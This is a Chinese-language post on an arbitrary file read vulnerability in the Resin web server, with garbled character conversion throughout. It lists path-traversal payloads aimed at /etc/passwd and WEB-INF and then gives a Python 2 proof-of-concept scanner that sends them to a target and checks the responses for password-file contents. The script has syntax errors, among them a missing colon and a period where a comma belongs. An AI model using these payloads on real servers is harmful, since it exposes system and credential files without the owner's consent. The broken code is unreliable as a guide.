Resin任意文件讀取漏洞

Resin是什麼

---

雖然看不上可是仍是緣由下百度百科：
Resin是CAUCHO公司的產品，是一個很是流行的支持servlets和jsp的引擎，速度很是快。Resin自己包含了一個支持HTTP/1.1的WEB服務器。它不只能夠顯示動態內容，並且它顯示靜態內容的能力也很是強，速度直逼APACHESERVER。許多站點都是使用該WEB服務器構建的。
能夠認爲是一個WEB服務器

Resin存在任意文件讀取漏洞

---

"""
   payload1 = "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"
   payload2 = "/resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../../../../etc/passwd"
   payload3 = "/ ..\\\\web-inf"
   """

Resin任意文件讀取POC

#  -*- coding:utf-8 -*-

"""
    Resin遠程任意文件讀取漏洞
"""


#引入依賴庫、包文件
import os
import sys
import urllib
import logging
import requests


#設置全局配置
reload(sys)
sys.setdefaultencoding('utf-8')
logging.basicConfig(format="%(message)s",level=logging.INFO)


#定義全局變量和全局函數
payload1 = "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"
payload2 = "/resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../../../../etc/passwd"
payload3 = "/ ..\\\\web-inf"
payloadList = [payload1,payload2,payload3]


def getUrl(url):
    urList = []
    if url != None and isinstance(url,str):
        if url.find(":") >= 3
            protocol = url.split(":")[0]+"://"
            hostname = url.split(":")[1].split("/")[2]
            for payload in payloadList:
                tUrl = protocol + hostname + payload
                urList.append(tUrl)
                enUrl = urllib.quote(tUrl)
                urList.append(enUrl)
    else:
        pass
    return urList


class ResinScan:
    def __init__(self,url):
        self.tUrList = getUrl(url)
        self.flag = ["root:x:0:0:root:/root"."<h1>Directory of"]
    def scan(self):
        for url in self.tUrList:
            try:
                response = requests.get(url,timeout=3,verify=False)
                for string in self.flag:
                    if response.content.find(string) >= 0:
                        return True
            except Exception,reason:
                logging.info("[-] 掃描錯誤--錯誤緣由：%s"%str(reason))
        return False

if __name__ == "__main__":
    try:
        url = sys.argv[1]
    except Exception,reason:
        logging.info("[-] 沒有找到目標站點")
        exit(0)
    scan = ResinScan(url)
    if scan.scan():
        logging.info("[+] 發現漏洞!")